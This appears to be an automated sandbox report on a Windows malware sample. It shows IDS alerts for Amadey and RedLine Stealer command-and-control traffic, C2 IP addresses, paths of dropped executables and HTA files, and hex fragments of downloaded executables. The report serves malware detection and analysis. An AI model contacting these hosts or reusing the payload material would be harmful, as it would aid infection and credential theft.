                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, type: DROPPED
                                    Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49809 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49816 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49817 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49819 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49822 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49821 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49825 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49826 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49828 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49830 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49832 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49833 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49836 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49846 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49850 version: TLS 1.2
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000008.00000002.1319444757.00000287A8E77000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Hpdbtem.pdbe- source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Portals.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.Windows.Forms.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: mscorlib.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Through.pdb source: mAtJWNv.exe.14.dr, mAtJWNv[1].exe.14.dr
                                    Source: Binary string: mscorlib.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb) source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: RegAsm.pdb source: RegAsm.exe.41.dr
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe.41.dr
                                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Portals.pdbIL_STUB_PInvoke source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0048DBBE
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0045C2A2 FindFirstFileExW,0_2_0045C2A2
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004968EE FindFirstFileW,FindClose,0_2_004968EE
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0049698F
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D076
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D3A9
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00499642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00499642
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049979D
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00499B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00499B2B
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00495C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00495C97
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\789919\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\789919
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49715 -> 176.113.115.6:80
                                    Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.4:49824 -> 185.125.50.8:80
                                    Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49824 -> 185.125.50.8:80
                                    Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49847 -> 101.99.92.190:40919
                                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49847 -> 101.99.92.190:40919
                                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 101.99.92.190:40919 -> 192.168.2.4:49847
                                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49847 -> 101.99.92.190:40919
                                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 101.99.92.190:40919 -> 192.168.2.4:49847
                                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 101.99.92.190:40919 -> 192.168.2.4:49847
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorIPs: 176.113.115.6
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:48:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 14:09:28 GMTETag: "1df200-62fd54987adb0"Accept-Ranges: bytesContent-Length: 1962496Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 f0 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4e 00 00 04 00 00 54 3d 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 d9 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d9 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2c 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6d 70 71 6d 62 61 67 00 e0 1a 00 00 00 33 00 00 de 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6e 63 66 62 73 62 69 00 10 00 00 00 e0 4d 00 00 04 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4d 00 00 22 00 00 00 d0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 13:50:38 GMTETag: "1413e6-62fd506315261"Accept-Ranges: bytesContent-Length: 1315814Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 11 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 68 09 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 09 01 00 00 00 10 00 00 0a 01 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 10 11 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 16:22:33 GMTETag: "5b000-62fc307a5c12a"Accept-Ranges: bytesContent-Length: 372736Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1f 51 ff ad 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 22 00 00 00 08 00 00 00 00 00 00 66 3b 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 3b 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 80 3a 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 20 00 00 00 20 00 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 82 05 00 00 a0 00 00 00 82 05 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 12:54:44 GMTETag: "1f8e00-62fc020741cbc"Accept-Ranges: bytesContent-Length: 2067968Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 f5 e9 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 00 06 00 00 02 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 20 06 00 00 02 00 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 68 65 68 77 6d 63 00 70 19 00 00 f0 2f 00 00 62 19 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6f 65 6c 78 6c 6f 61 00 10 00 00 00 60 49 00 00 04 00 00 00 68 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 6c 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 11:00:14 GMTETag: "37ee8e-62faa69169064"Accept-Ranges: bytesContent-Length: 3665550Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 14 00 00 04 00 00 e3 1f 38 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 d8 52 05 00 00 00 00 00 00 00 00 00 3e b9 37 00 50 35 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d8 52 05 00 00 40 0f 00 00 54 05 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 14 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
